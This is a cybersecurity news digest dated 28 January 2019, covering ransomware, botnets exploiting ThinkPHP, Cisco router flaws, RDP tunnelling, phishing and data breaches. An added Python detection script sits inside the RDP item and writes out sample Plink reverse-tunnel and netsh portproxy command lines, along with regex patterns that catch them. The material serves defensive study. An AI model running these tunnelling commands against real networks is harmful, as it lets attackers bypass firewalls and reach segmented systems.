Silobreaker Daily Cyber Digest – 28 January 2019
MalwareHunterTeam discovers new ransomware with malicious ransom note
- The researchers discovered the ransomware, dubbed CryTekk, has added a social engineering tactic to its ransom note. The note provides an additional payment option for victims who want to gain their files back but don’t have a cryptocurrency wallet.
- Clicking the ‘Buy now’ button for the PayPal option opens a tab that directs users to a phishing page asking for card details. If this is filled in and the ‘agree and confirm’ button is clicked, users are directed to another phishing page that asks for more personal information.
- Victims are then shown a page stating that their account has been fully restored, which suggests that they have in fact not been paying the ransom but instead have had their details stolen.
ThinkPHP vulnerability exploited by Hakai and Yowai botnets
- Trend Micro researchers reported that attackers are compromising websites built with the ThinkPHP framework to breach web servers, then spreading via dictionary attacks on default credentials. The infected devices are being used as part of the Hakai and Yowai botnets to launch distributed denial-of-service (DDoS) attacks.
- The Yowai botnet was found to have a configuration table similar to that of the Mirai botnet. Its configuration table can be decrypted via the same procedures, and it adds the ThinkPHP exploit alongside other known vulnerabilities, such as CVE-2014-8361 and CVE-2018-10561, to its list of infection vectors. Yowai listens on port 6 to receive commands from the C&C server. After infecting a router, it launches a dictionary attack in an attempt to infect other devices.
- The Hakai botnet was discovered to be a variant of the Gafgyt botnet. It was previously seen infecting IoT devices and relied on router vulnerabilities for propagation. The exploited flaws include CVE-2015-2051, CVE-2014-8361 and CVE-2017-17215.
Source (Includes IOCs)
Hackers target Cisco RV320 & RV325 routers with new exploits
- The disclosure of proof-of-concept exploit code for security flaws in Cisco routers has led hackers to scan for vulnerable devices in an attempt to gain full control of them. Updates were released this week fixing a command injection flaw tracked as CVE-2019-1652 and an information disclosure flaw tracked as CVE-2019-1653, both present in the routers’ web management interface.
- The exploit code detailed how a hacker chaining these two flaws together could obtain hashed access credentials for a privileged account, and therefore be able to run arbitrary commands as root.
- According to Troy Mursch, over 9,550 out of 20,000 reachable routers, mostly in the US, were found to be affected by the information disclosure flaw, and hackers have started searching for them.
Attackers conducting RDP attacks increasingly using network tunnelling to bypass protections
- FireEye researchers observed that threat actors are using native Windows Remote Desktop Protocol (RDP) utilities to connect laterally across systems in compromised environments. Through network tunnelling and host-based port forwarding, attackers have been increasingly able to bypass firewalls and NAT rules.
- According to the researchers, a common utility used to tunnel RDP sessions is PuTTY Link (Plink), which can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. FireEye states that ‘since many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network, attackers such as FIN8 have used Plink to create encrypted tunnels that allow RDP ports on infected systems to communicate back to the attackers’ C&C server.’
- FireEye has also found that attackers are using the Windows Network Shell (netsh) command for RDP port forwarding, in order to reach newly discovered segmented networks that are otherwise accessible only through an administrative jump box.
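From a detection standpoint, both techniques leave a distinctive process command line on the host. The following is an added example (not code from the digest or from FireEye) that runs simple rules over constructed Windows process-creation events to flag a Plink reverse tunnel whose destination is the RDP port and a netsh portproxy rule that forwards to RDP; all hosts, ports and paths in the sample are made up.

```python
import re
from typing import Dict, List

# Constructed sample of Windows process-creation events ("image|command line"),
# not taken from the digest or from FireEye's report; hosts and ports are made up.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
    r"C:\Users\ops\plink.exe|plink.exe ops@203.0.113.5 -P 22 -N -R 12345:127.0.0.1:3389",
    r"C:\Windows\System32\netsh.exe|netsh interface portproxy add v4tov4 "
    r"listenport=8001 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.0.5.20",
    r"C:\Windows\System32\netsh.exe|netsh advfirewall show allprofiles",
    r"C:\Program Files\PuTTY\plink.exe|plink.exe -ssh admin@10.0.0.9 -L 8080:127.0.0.1:80",
]

# Plink remote forward (-R) whose destination is port 3389: the host's own RDP
# service is being exposed back through an outbound SSH session.
PLINK_RDP_REVERSE = re.compile(r"(?i)\bplink\b.*\s-R\s+\S*:3389\b")
# netsh portproxy rule that connects to 3389: host-based RDP port forwarding.
NETSH_PORTPROXY_RDP = re.compile(
    r"(?i)\bnetsh\b.*\binterface\s+portproxy\s+add\b.*\bconnectport=3389\b")
# Any new portproxy rule is unusual on a workstation and worth a low-severity alert.
NETSH_PORTPROXY_ANY = re.compile(r"(?i)\bnetsh\b.*\binterface\s+portproxy\s+add\b")

RULES = [
    ("plink_rdp_reverse_tunnel", "high", PLINK_RDP_REVERSE),
    ("netsh_portproxy_to_rdp", "high", NETSH_PORTPROXY_RDP),
    ("netsh_portproxy_added", "low", NETSH_PORTPROXY_ANY),
]


def classify(cmdline: str):
    """Return (rule name, severity) for the first matching rule, else None."""
    for name, severity, pattern in RULES:
        if pattern.search(cmdline):
            return name, severity
    return None


def scan(events: List[str]) -> List[Dict[str, str]]:
    """Run every event through the rules and collect the hits with context."""
    findings = []
    for event in events:
        image, _, cmdline = event.partition("|")
        hit = classify(cmdline)
        if hit:
            findings.append({"image": image, "rule": hit[0],
                             "severity": hit[1], "cmdline": cmdline})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']}: {f['cmdline']}")
```

A plain local forward (-L) and unrelated netsh usage are deliberately left unflagged, so the rules can be tuned against a baseline of legitimate administrative activity before being deployed.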
Two malicious campaigns targeting naval industry deliver Adwind RAT
- Cybaze-Yoroi ZLab researchers found infection attempts aiming to install Adwind RAT on victims’ machines. Two waves of malicious emails were observed targeting the naval industry.
- In the first wave, emails were disguised as purchase orders impersonating administrative staff of an Italian company operating in hydraulic and lifting sectors. In the second wave, the emails were impersonating a German logistics company.
- Upon further inspection, the researchers discovered that the two campaigns were linked to the same threat actor. The dropper samples were found to have the same encoded payload strings.
Source (Includes IOCs)
DNS hijacking activity targets multiple sectors since 2017
- Researchers at Crowdstrike discovered a subset of domains affected by the recent widespread DNS hijacking activity. They found that 28 organizations in 12 countries were affected so far. Targets include government organizations, insurance firms, civilian aviation firms, internet service providers and infrastructure providers. Some of the targeted organizations were affected as far back as February 2017.
- According to Crowdstrike, the ultimate objective of the campaign remains unknown; however, DNS hijacking could allow the perpetrators to capture the content of web traffic going to affected domains and potentially exploit the captured data in subsequent operations.
- Although Crowdstrike does not attribute the activity to any specific threat actor, the firm acknowledges that public reporting has indicated that several factors point to a possible Iranian nexus for the operation.
GandCrab and Ursnif ransomware delivered in email phishing campaign
- Discovered by researchers at Carbon Black, the emails are delivering malicious Word documents as attachments that contain embedded macros. The macros deliver GandCrab and Ursnif variants that are capable of gathering system data before encrypting it to extort payment.
- It is unclear how many victims are in the campaign, but researchers estimate that there are at least 180 Word document variants in the wild.
Hackers increasingly focusing efforts on disruption of Ukraine’s presidential election
- Reuters reported that hackers likely controlled by Russia are increasingly targeting electoral servers and personal computers of staff involved in the upcoming Ukrainian presidential elections set to take place in March.
- According to the head of Ukraine’s cyber police, Serhiy Demedyuk, attackers are using virus-infected New Year’s greeting cards, shopping invitations, software updates offers, and other phishing material to steal passwords and personal information from victims. Hackers were also observed buying personal details of election officials on the dark web.
Leaks and Breaches
Data breach affects five health insurers in Delaware
- Delaware Department of Insurance officials stated that five health insurers and about 650 of their members were affected by a data breach at a third-party administrator, BenefitMall, in October 2018.
- Individuals with health insurance at Highmark BCBS, Aetna, Emblem Health, Humana, or UnitedHealth may have been affected.
B&Q data leak exposes information on thefts and suspected offenders
- A database of 70,000 offender and incident logs had been left accessible to anyone. The data was held on an Elasticsearch server with no password.
- The exposed data includes some people’s names and vehicle details. Ctrlbox’s Lee Johnstone discovered the leak and informed B&Q via Twitter, after which the data remained accessible for a further two weeks before the server was taken offline.
LocalBitcoins suffers security breach
- The breach occurred around January 26th, 2019, and lasted approximately five hours before the company intervened. The LocalBitcoins forum was redirecting users to a page mimicking its login form, which was also capable of asking for 2FA codes if accounts used this mechanism.
- The company later confirmed that the forum had been breached via a vulnerability in a feature powered by third party software, and that the feature was disabled until further notice. In total, 7.95 Bitcoins, with an approximate market value of $28,200, were stolen.
- The company has since stated that LocalBitcoins accounts are currently safe to use, and that two-factor authentication should be enabled if it hasn’t been already.
Ascension’s financial files exposed via unsecured Amazon S3 bucket and Elasticsearch server
- Security researcher Bob Diachenko and TechCrunch found that an Amazon S3 storage server, belonging to Texas-based Ascension, and managed by a third-party vendor OpticsML, leaked documents belonging to banks and financial institutions across the US, including loans and mortgage agreements.
- The unsecured server contained 21 files consisting of 23,000 pages of PDF documents. Some of the documents were found to be from the US Department of Housing and Urban Development, while others included W-2 tax forms, loan repayment schedules and other sensitive financial information. Many of the files also contained names, addresses, phone numbers and Social Security numbers.
- Some of the same data, belonging to Ascension and totalling over 24 million financial and banking documents, was previously found by Diachenko to be exposed via an unprotected Elasticsearch database on January 10th, 2018.
Dailymotion resets passwords following a credential stuffing attack
- Dailymotion announced that some of their accounts had been targeted in a credential stuffing attack. The company stated that the security team recognised the unauthorised access attempts on January 19th and the attack was still running six days later.
Multiple vulnerabilities discovered in industrial switches
- Six vulnerabilities discovered in FL switches by Phoenix Contact can be exploited to conduct unauthorised activities, including a denial-of-service condition or a man-in-the-middle (MitM) attack. These affect the 3xxx, 4xxx, and 48xx series switches running firmware version 1.35 or prior.
- The flaws include a cross-site request forgery issue, a brute force attack vulnerability on a username and password interface, and a web interface accessed over HTTP, allowing a MitM interception attack.
- The vulnerabilities have since been addressed in the latest firmware update released by Phoenix Contact.
Vulnerabilities discovered in LabKey server
- The vulnerabilities include CVE-2019-3911, a cross-site scripting flaw resulting from poor validation and sanitization; CVE-2019-3912, an open redirect issue caused by an unsanitized function that allows return paths to be edited; and CVE-2019-3913, a logic flaw in LabKey server’s network drive mapping functionality.
PDF exploit utilises steganographic techniques
- The malicious sample was detected as an exploit for CVE-2013-3346, and researchers noted that the technique is effective and were impressed by its efficiency.
WordPress WSOD protection feature could leave WordPress sites vulnerable
- The new WSOD (white screen of death) protection feature, included in WordPress CMS 5.1, is built to ensure the platform can detect fatal PHP errors and determine the plugin or theme responsible. Researchers have stated that this could allow attackers to deliberately cause a PHP error in a plugin and intrude once the WSOD protection feature stops that plugin from executing.
Data leak in Ghostscript permits routine takeover and command execution
- Researcher Tavis Ormandy discovered that Ghostscript fails to protect subroutines correctly, resulting in data leaks and allowing an attacker to take over the routine or even execute commands on affected systems.
- The vulnerability is tracked as CVE-2019-6116 and has since been patched.
Test finds large proportion of keyless cars vulnerable to relay attacks
- A test of 237 keyless cars by the German General Automobile Club (ADAC) found that 230 of them could be easily unlocked by criminals using cheap electronic equipment bought online.
- Popular cars such as the Ford Fiesta, Volkswagen Golf, Nissan Qashqai and Ford Focus were found to be vulnerable to this form of attack.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.